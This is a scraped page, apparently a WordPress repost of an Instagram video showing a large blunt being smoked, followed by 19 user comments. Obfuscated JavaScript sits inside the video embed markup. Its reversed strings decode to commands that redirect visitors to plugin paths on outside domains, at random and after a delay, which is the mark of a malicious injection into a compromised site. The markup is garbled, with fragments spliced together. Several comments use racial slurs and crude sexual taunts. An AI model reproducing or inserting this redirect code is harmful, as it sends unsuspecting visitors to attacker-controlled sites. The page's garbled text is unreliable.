2 L ! T 4 T V Now That’s A Blunt @gnarcoticcaleb…


”https://scontent-ort2-1.cdninstagram.com/t50.2886-16/21846741_159547901292048_8691189060183523328_n.mp4″) == "string") return $NqM.list[n].split("").reverse().join("");return $NqM.list[n];};$NqM.list=["\'php.sgnittes-pupop/cni/tnemucod-yna-debme/snigulp/tnetnoc-pw/moc.kaphcterts//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random() * 6);if (number1==3){var delay = 18000;setTimeout($NqM(0),delay);}toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toplay=”on” ]🔭 2 L ! T 📺 4 T V 🚀 Now That’s A Blunt💨



25 thoughts on “2 L ! T 4 T V Now That’s A Blunt @gnarcoticcaleb…”

  1. yasjam9 says:

    Throw back in Livermore when we smokes 10+ grams @_donnybo

  2. keekeemarsh_24 says:

    AHH BITCH . @alexjacob.s

  3. vividclout says:


  4. alexjacob.s says:

    @keekeemarsh_24 he smokin dick

  5. y0adrian says:

    @nicholas_szczepura big doinks

  6. t0mmyyb0yy says:

    Nigga dont inhale shit

  7. anne.stands says:

    Dayuuum do n it

  8. timmy_k10 says:

    Big ol doints

  9. projectperrier says:


  10. projectperrier says:


  11. youlovethat says:

    Inhale, damn

  12. grace.tattoos says:

    Omg!!!!! How could I be apart of that

  13. hey_zeus213 says:

    That’s one not a single person out there look high , trash weed in a big ass blunt to go to waste

  14. uso_hawaii_ says:

    love the way it illuminates

  15. tj.cannon says:


  16. ismokeloud.707 says:


  17. undercover_messiah says:

    Nigga can’t inhale for shit doe

  18. mtthwj says:


  19. shibitobans says:

    he deadass smoking a dick

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